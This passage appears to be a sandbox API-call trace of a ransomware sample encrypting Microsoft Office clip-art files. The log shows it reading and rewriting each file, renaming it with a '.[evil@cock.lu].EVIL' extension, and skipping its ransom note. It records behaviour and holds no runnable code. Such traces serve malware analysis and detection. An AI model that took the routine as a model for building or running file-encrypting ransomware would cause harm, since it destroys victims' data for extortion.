_SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.886] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 69 [0104.886] wcscmp (_String1="AG00004_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.886] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00004_.GIF") returned 0x0 [0104.886] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 0x45 [0104.886] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0104.888] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2340, lpOverlapped=0x0) returned 1 [0104.895] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.895] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.895] _errno () returned 0x84b1160840 [0104.895] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.895] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2360, lpOverlapped=0x0) returned 1 [0104.896] CloseHandle (hObject=0x1a8) returned 1 [0104.896] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.896] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.896] __uncaught_exception () returned 0x84b1160800 [0104.896] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.896] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif.[evil@cock.lu].evil")) returned 1 [0104.897] ??_V@YAXPEAX@Z () returned 0x1 [0104.900] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF", dwFileAttributes=0x200) returned 0 [0104.900] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0104.900] wcsstr (_Str="AG00011_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.900] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 69 [0104.900] wcscmp (_String1="AG00011_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.900] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00011_.GIF") returned 0x0 [0104.900] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 0x45 [0104.900] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0104.902] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c30, lpOverlapped=0x0) returned 1 [0104.920] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.920] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.920] _errno () returned 0x84b1160840 [0104.920] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.920] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c40, lpOverlapped=0x0) returned 1 [0104.920] CloseHandle (hObject=0x1a8) returned 1 [0104.920] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.920] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.920] __uncaught_exception () returned 0x84b1160800 [0104.921] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.921] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif.[evil@cock.lu].evil")) returned 1 [0104.921] ??_V@YAXPEAX@Z () returned 0x1 [0104.924] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF", dwFileAttributes=0x200) returned 0 [0104.924] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0104.924] wcsstr (_Str="AG00021_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.924] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 69 [0104.924] wcscmp (_String1="AG00021_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.924] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00021_.GIF") returned 0x0 [0104.924] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 0x45 [0104.924] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0104.926] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3a19, lpOverlapped=0x0) returned 1 [0104.944] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.944] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.944] _errno () returned 0x84b1160840 [0104.944] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.944] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3a20, lpOverlapped=0x0) returned 1 [0104.944] CloseHandle (hObject=0x1a8) returned 1 [0104.944] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.945] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.945] __uncaught_exception () returned 0x84b1160800 [0104.945] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.945] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif.[evil@cock.lu].evil")) returned 1 [0104.945] ??_V@YAXPEAX@Z () returned 0x1 [0104.948] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF", dwFileAttributes=0x200) returned 0 [0104.948] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0104.948] wcsstr (_Str="AG00037_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.948] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 69 [0104.948] wcscmp (_String1="AG00037_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.948] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00037_.GIF") returned 0x0 [0104.948] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 0x45 [0104.948] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0104.950] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a1c, lpOverlapped=0x0) returned 1 [0104.958] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.958] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.958] _errno () returned 0x84b1160840 [0104.958] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.958] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a20, lpOverlapped=0x0) returned 1 [0104.958] CloseHandle (hObject=0x1a8) returned 1 [0104.958] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.958] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.959] __uncaught_exception () returned 0x84b1160800 [0104.959] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.959] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif.[evil@cock.lu].evil")) returned 1 [0104.959] ??_V@YAXPEAX@Z () returned 0x1 [0104.962] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF", dwFileAttributes=0x200) returned 0 [0104.962] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0104.962] wcsstr (_Str="AG00038_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.962] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 69 [0104.962] wcscmp (_String1="AG00038_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.962] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00038_.GIF") returned 0x0 [0104.962] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 0x45 [0104.962] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0104.964] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcb3, lpOverlapped=0x0) returned 1 [0104.971] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.971] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.971] _errno () returned 0x84b1160840 [0104.971] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.971] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xcc0, lpOverlapped=0x0) returned 1 [0104.971] CloseHandle (hObject=0x1a8) returned 1 [0104.971] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.972] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.972] __uncaught_exception () returned 0x84b1160800 [0104.972] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.972] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif.[evil@cock.lu].evil")) returned 1 [0104.973] ??_V@YAXPEAX@Z () returned 0x1 [0104.975] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF", dwFileAttributes=0x200) returned 0 [0104.975] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0104.976] wcsstr (_Str="AG00040_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.976] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 69 [0104.976] wcscmp (_String1="AG00040_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.976] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00040_.GIF") returned 0x0 [0104.976] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 0x45 [0104.976] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0104.977] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1fa1, lpOverlapped=0x0) returned 1 [0104.984] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.984] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.984] _errno () returned 0x84b1160840 [0104.984] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.984] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1fc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1fc0, lpOverlapped=0x0) returned 1 [0104.984] CloseHandle (hObject=0x1a8) returned 1 [0104.984] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.984] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.984] __uncaught_exception () returned 0x84b1160800 [0104.984] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.985] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif.[evil@cock.lu].evil")) returned 1 [0104.985] ??_V@YAXPEAX@Z () returned 0x1 [0104.988] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF", dwFileAttributes=0x200) returned 0 [0104.988] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0104.988] wcsstr (_Str="AG00052_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.988] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 69 [0104.988] wcscmp (_String1="AG00052_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.988] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00052_.GIF") returned 0x0 [0104.988] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 0x45 [0104.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0104.990] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e06, lpOverlapped=0x0) returned 1 [0104.997] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.997] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.997] _errno () returned 0x84b1160840 [0104.997] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.997] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1e20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e20, lpOverlapped=0x0) returned 1 [0104.997] CloseHandle (hObject=0x1a8) returned 1 [0104.997] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.998] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.998] __uncaught_exception () returned 0x84b1160800 [0104.998] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.998] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif.[evil@cock.lu].evil")) returned 1 [0104.999] ??_V@YAXPEAX@Z () returned 0x1 [0105.001] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF", dwFileAttributes=0x200) returned 0 [0105.001] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0105.001] wcsstr (_Str="AG00057_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0105.001] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 69 [0105.001] wcscmp (_String1="AG00057_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0105.001] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00057_.GIF") returned 0x0 [0105.002] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 0x45 [0105.002] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0105.003] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2e73, lpOverlapped=0x0) returned 1 [0105.010] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0105.010] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0105.010] _errno () returned 0x84b1160840 [0105.010] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.010] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2e80, lpOverlapped=0x0) returned 1 [0105.010] CloseHandle (hObject=0x1a8) returned 1 [0105.010] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0105.011] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0105.011] __uncaught_exception () returned 0x84b1160800 [0105.011] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0105.011] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif.[evil@cock.lu].evil")) returned 1 [0105.011] ??_V@YAXPEAX@Z () returned 0x1 [0105.014] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF", dwFileAttributes=0x200) returned 0 [0105.014] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0105.014] wcsstr (_Str="AG00090_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0105.014] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 69 [0105.014] wcscmp (_String1="AG00090_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0105.014] wcsstr 